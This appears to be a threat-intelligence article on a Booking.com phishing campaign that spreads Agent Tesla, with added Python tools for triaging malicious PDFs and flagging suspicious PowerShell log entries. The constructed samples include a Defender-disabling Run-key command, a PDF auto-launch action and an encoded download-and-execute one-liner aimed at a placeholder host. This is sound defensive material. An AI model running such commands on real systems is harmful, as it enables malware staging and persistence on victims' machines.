Booking.com Impersonation Campaign: Agent Tesla Malware Analysis
Forcepoint has uncovered a malware campaign that exploits Booking.com’s brand reputation to deliver Agent Tesla, a remote access trojan (RAT) best known for stealing credentials.
The attackers trade on the trust associated with Booking.com, crafting phishing emails that pose as refund notifications. Each email carries a PDF attachment and asks the recipient to open it to view the card statement.
The malicious PDF utilizes a two-pronged strategy:
- Deceptive pop-up: a dialog that tricks the user into clicking a fake link or button, which downloads a JavaScript file. The prompt reinforces the illusion of a legitimate refund process. The JavaScript is heavily obfuscated to hinder analysis and detection, and its only real job is to fetch the next stage, the PowerShell script.
- Embedded code: an action embedded in the PDF that downloads the PowerShell script directly, with no further user interaction, which maximizes the campaign’s effectiveness. This script is the centerpiece of the attack and is itself heavily obfuscated to evade security controls. It disables antivirus, modifies registry entries and establishes persistence, then downloads and executes the final Agent Tesla DLL payload.
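Both prongs depend on dictionary keys inside the PDF: an automatic action (/OpenAction or /AA) for the embedded code, and a JavaScript, Launch or URI action for the thing the user clicks. The static triage script below is an added example, not code from Forcepoint’s report, and the sample PDF it scans is constructed for this illustration (the example.invalid URLs are placeholders). It resolves hex-escaped names (the /#4Aava#53cript trick that defeats a naive grep), inflates FlateDecode streams so actions hidden in compressed objects are counted too, and collects every URL it finds before assigning a coarse verdict.

```python
import json
import re
import zlib

# Dictionary keys a phishing PDF needs in order to run code or reach out to
# the network with nothing more than the file being opened (or one click).
TRIGGER_KEYS = (
    b"/OpenAction",    # action fired when the document opens
    b"/AA",            # additional actions: page open, form field events
    b"/JavaScript",    # JavaScript action dictionary
    b"/JS",            # the script body itself
    b"/Launch",        # run an external program
    b"/URI",           # open a URL (the "click here" prong)
    b"/SubmitForm",    # POST form data to a URL
    b"/EmbeddedFile",  # file attachment, often the dropper
)

NAME_RE = re.compile(rb"/([A-Za-z0-9#._\-+]+)")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
URL_RE = re.compile(rb"https?://[^\s()<>\"']+")


def decode_name(raw: bytes) -> bytes:
    """Resolve #XX hex escapes so /#4Aava#53cript reads as /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), raw)


def normalize_names(data: bytes) -> bytes:
    """Rewrite every name token with its escapes resolved, so a plain
    substring count cannot be fooled by an escaped spelling."""
    return NAME_RE.sub(lambda m: b"/" + decode_name(m.group(1)), data)


def inflate_streams(data: bytes) -> bytes:
    """Concatenate the content of every stream zlib can inflate (FlateDecode);
    object streams and hidden action dictionaries commonly live there."""
    out = []
    for m in STREAM_RE.finditer(data):
        try:
            out.append(zlib.decompress(m.group(1)))
        except zlib.error:
            continue  # other filter or corrupt data: skip it
    return b"\n".join(out)


def triage_pdf(data: bytes) -> dict:
    """Static triage: count auto-action keys and collect URLs across the raw
    file and its inflated streams, then assign a coarse verdict."""
    scanned = normalize_names(data) + b"\n" + normalize_names(inflate_streams(data))
    counts = {}
    for key in TRIGGER_KEYS:
        # the lookahead stops a key from matching as the prefix of a longer name
        counts[key.decode()] = len(re.findall(re.escape(key) + rb"(?![A-Za-z])", scanned))
    urls = sorted({u.decode(errors="replace") for u in URL_RE.findall(scanned)})
    auto = counts["/OpenAction"] + counts["/AA"] > 0
    active = sum(counts[k] for k in ("/JavaScript", "/JS", "/Launch", "/SubmitForm")) > 0
    if counts["/Launch"] or (auto and active):
        verdict = "suspicious"   # code or a program launch runs on open
    elif active or urls:
        verdict = "review"       # needs a click, or merely links out
    else:
        verdict = "clean"
    return {"counts": counts, "urls": urls, "verdict": verdict}


# Constructed sample, not an artifact from the campaign: an OpenAction that
# points at a JavaScript action (name hex-escaped to dodge a naive grep),
# a clickable link annotation, and a Flate-compressed stream hiding a URL.
_HIDDEN = zlib.compress(b"<< /S /URI /URI (http://example.invalid/stage2.ps1) >>")
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
    b"3 0 obj\n<< /Type /Page /Parent 2 0 R /Annots [5 0 R] >>\nendobj\n"
    b"4 0 obj\n<< /S /#4Aava#53cript /JS (app.launchURL('http://example.invalid/refund.js', true);) >>\nendobj\n"
    b"5 0 obj\n<< /Type /Annot /Subtype /Link /A << /S /URI /URI (http://example.invalid/statement) >> >>\nendobj\n"
    b"6 0 obj\n<< /Length " + str(len(_HIDDEN)).encode() + b" /Filter /FlateDecode >>\n"
    b"stream\n" + _HIDDEN + b"\nendstream\nendobj\n"
    b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    print(json.dumps(triage_pdf(SAMPLE_PDF), indent=2))
```

The sample scores "suspicious" because an automatic action and a JavaScript action appear together, and all three URLs surface, including the one inside the compressed stream. The script works at the byte level and only inflates Flate streams, so PDFs using other filters (LZW, ASCIIHex) or encryption need a real parser such as pdfid or peepdf; treat this as a first-pass sort for a mailbox full of "refund" attachments, not as a full analysis.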
The end state of this scheme is Agent Tesla running on the victim’s machine. It harvests credentials and personal data and sends them to a private Telegram chat controlled by the attackers. It does not stop there: the malware maintains its foothold through additional PowerShell scripts that keep re-establishing persistence on the compromised system.
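The PowerShell stages described above (antivirus disabled, registry changes, persistence, a downloaded and executed payload) are exactly what PowerShell script block logging (Event ID 4104) records, even when the script on disk is obfuscated. The detector below is an added example, not Forcepoint’s tooling, and the three log lines it runs over are constructed for the illustration in a simplified "time|host|ScriptBlockText" export (not the Windows event format). Each rule is an AND of OR-groups, so "download_execute" only fires when a fetch primitive and an execution primitive occur in the same block, and -EncodedCommand arguments are decoded (base64 of UTF-16LE) before matching so the wrapper cannot hide the command.

```python
import base64
import re

# One rule per behaviour in the chain. A rule fires when every group has at
# least one matching pattern (AND of ORs), so "download_execute" needs both a
# fetch primitive and an execution primitive in the same script block.
RULES = {
    "av_tamper": [[
        r"Set-MpPreference\s[^\n]*-Disable\w+",
        r"Add-MpPreference\s[^\n]*-Exclusion(?:Path|Process|Extension)",
        r"Stop-Service\s[^\n]*\b(?:WinDefend|Sense)\b",
    ]],
    "registry_persistence": [[
        r"(?:Set|New)-ItemProperty\s[^\n]*\\CurrentVersion\\Run",
        r"\breg(?:\.exe)?\s+add\s[^\n]*\\CurrentVersion\\Run",
        r"Register-ScheduledTask|schtasks(?:\.exe)?\s+/create",
    ]],
    "download_execute": [
        [r"Download(?:String|File|Data)\s*\(",
         r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|Start-BitsTransfer"],
        [r"\bIEX\b|Invoke-Expression", r"Assembly\]::Load\w*\(",
         r"Add-Type\s[^\n]*-TypeDefinition", r"\brundll32\b"],
    ],
}

# -EncodedCommand (also -enc, -ec, -e) takes base64 of a UTF-16LE string;
# decode it so the rules see the real command rather than an opaque blob.
ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def expand_encoded(text: str):
    """Return the text plus the decoded form of any -EncodedCommand argument,
    and whether at least one was found."""
    decoded = []
    for m in ENC_RE.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(1)).decode("utf-16le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not a valid encoded command; leave the text as is
    return text + "".join("\n" + d for d in decoded), bool(decoded)


def scan_block(script_text: str) -> list:
    """Names of the rules that fire on one ScriptBlockText value."""
    text, had_encoded = expand_encoded(script_text)
    hits = [name for name, groups in RULES.items()
            if all(any(re.search(p, text, re.IGNORECASE) for p in group)
                   for group in groups)]
    if had_encoded:
        hits.append("encoded_command")
    return hits


def scan_events(lines) -> list:
    """Run the rules over 'time|host|ScriptBlockText' lines and return only
    the events that hit, with the rules that fired. maxsplit=2 keeps pipes
    inside the PowerShell text intact."""
    findings = []
    for line in lines:
        time, host, script = line.split("|", 2)
        hits = scan_block(script)
        if hits:
            findings.append({"time": time, "host": host, "hits": hits})
    return findings


# Constructed sample export of Event ID 4104 ScriptBlockText (not real logs):
# one benign block, one that tampers with Defender and adds a Run key, and
# one encoded download-and-execute one-liner pointing at a placeholder host.
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
    .encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    "2024-01-01T09:00:00Z|WS01|Get-ChildItem C:\\Users\\alice\\Documents -Recurse | Measure-Object",
    "2024-01-01T09:01:12Z|WS01|Set-MpPreference -DisableRealtimeMonitoring $true; "
    "Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' "
    "-Name Updater -Value 'C:\\Users\\Public\\u.ps1'",
    "2024-01-01T09:01:13Z|WS01|powershell.exe -nop -w hidden -enc " + _ENC,
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f["time"], f["host"], ", ".join(f["hits"]))
```

On the sample, the benign listing produces nothing, the second block trips av_tamper and registry_persistence, and the encoded one-liner trips download_execute and encoded_command once decoded. The rules are deliberately coarse and keyed to the behaviours this campaign exhibits; in production, feed them the 4104 events from a host with script block logging enabled, and expect heavily obfuscated scripts to split cmdlet names across string concatenations, which these patterns will miss until the block has been de-obfuscated.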
This campaign is a stark reminder of the constant arms race in cybersecurity: attackers mimic trusted brands and weaponize everyday file types such as PDFs. Educating users on phishing tactics remains paramount. Emphasize the dangers of unsolicited attachments, the importance of verifying sender legitimacy, and the need to contact companies through their official channels rather than through links or attachments in an unexpected email. On the technical side, hardening the PDF reader (JavaScript off, prompts before following external links) and enabling PowerShell script block logging give defenders a block and a detection point for the two stages of this chain.